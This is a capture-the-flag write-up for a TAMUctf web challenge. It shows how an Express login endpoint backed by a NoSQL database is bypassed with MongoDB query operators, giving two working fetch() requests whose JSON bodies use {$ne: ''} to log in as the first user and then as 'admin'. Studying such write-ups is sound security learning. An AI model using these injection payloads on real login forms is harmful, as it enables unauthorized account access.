# Login App

[http://web4.tamuctf.com/](http://web4.tamuctf.com/)

![](Screen_Shot_2019-03-04_at_4-e5952c4d-de55-43bd-b6ac-2f47c3c02dc0.19.35_PM.png)

The webpage's default view

So after logging the login request, we can see the following response headers

![](Screen_Shot_2019-03-04_at_4-f792ce52-6f0a-43a9-9e31-54d3cd7a32f4.20.48_PM.png)

The `X-Powered-By: Express` tells us that this server is an [https://expressjs.com/](https://expressjs.com/) web app

Since this is a login app, we can assume it's an express server with some kind of ***NoSQL*** database storing data

Now, we need more information in order to see the interaction between the web server and our assumed NoSQL backend

![](Screen_Shot_2019-03-04_at_4-cca333d2-b8a0-4e37-be0f-c74c4e4d93d3.27.48_PM.png)

Here we can see that the request is `POST` ed to the API endpoint using JSON (`Content-Type: application/json`)

If we look up a simple app using both ExpressJS and a NoSQL database ([http://jasonwatmore.com/post/2018/06/14/nodejs-mongodb-simple-api-for-authentication-registration-and-user-management](http://jasonwatmore.com/post/2018/06/14/nodejs-mongodb-simple-api-for-authentication-registration-and-user-management))

    async function authenticate({ username, password }) {
        const user = await User.findOne({ username, password });
        if (user) {
            const { hash, ...userWithoutHash } = user.toObject();
            const token = jwt.sign({ sub: user.id }, config.secret);
            return {
                ...userWithoutHash,
                token
            };
        }
    }

it's pretty obvious that our input data (username & password) are passed directly into the equivalent of this app's `authenticate` function.

Therefore, we can control the direct input into the `User.findOne` query, and control the output. Our goal is to make it return the User record that we're looking for. In the default query

    User.findOne({ username: "username", password: "password" })

It directly matches the values within the database

However, we can use [query operators](https://docs.mongodb.com/manual/tutorial/query-documents/) in order to control the actual query. In this case, we can set both username and password to `{ $ne: ''}` to return the first record in the database

    fetch("http://web4.tamuctf.com/login", {
    	"credentials":"omit",
    	"headers": { 
    		"accept":"application/json, text/javascript, */*; q=0.01",
    		"accept-language":"en-US,en;q=0.9",
    		"content-type":"application/json;charset=UTF-8",
    		"x-requested-with":"XMLHttpRequest"
    	},
    	"referrer":"http://web4.tamuctf.com/?",
    	"referrerPolicy":"no-referrer-when-downgrade",
    	"body":JSON.stringify({ username: { $ne: "" }, password: { $ne: "" }}),
    	"method":"POST","mode":"cors"
    });

And we can see it works!

![](Screen_Shot_2019-03-04_at_4-ef8ef9dc-6bd5-4e9f-9250-76dc6f8efec2.41.41_PM.png)

So now we can look for specific users, luckily my first guess `admin` just straight up worked.

    fetch("http://web4.tamuctf.com/login", {
    	"credentials":"omit",
    	"headers": { 
			"accept":"application/json, text/javascript, */*; q=0.01",
    		"accept-language":"en-US,en;q=0.9",
    		"content-type":"application/json;charset=UTF-8",
    		"x-requested-with":"XMLHttpRequest"
    	},
    	"referrer":"http://web4.tamuctf.com/?",
    	"referrerPolicy":"no-referrer-when-downgrade",
    	"body":JSON.stringify({ username: "admin", password: { $ne: "" }}),
    	"method":"POST","mode":"cors"
    });

![](Screen_Shot_2019-03-04_at_4-7fdaa6a6-0eba-4014-9589-ea956ae15514.42.48_PM.png)

yaaaaaaaaay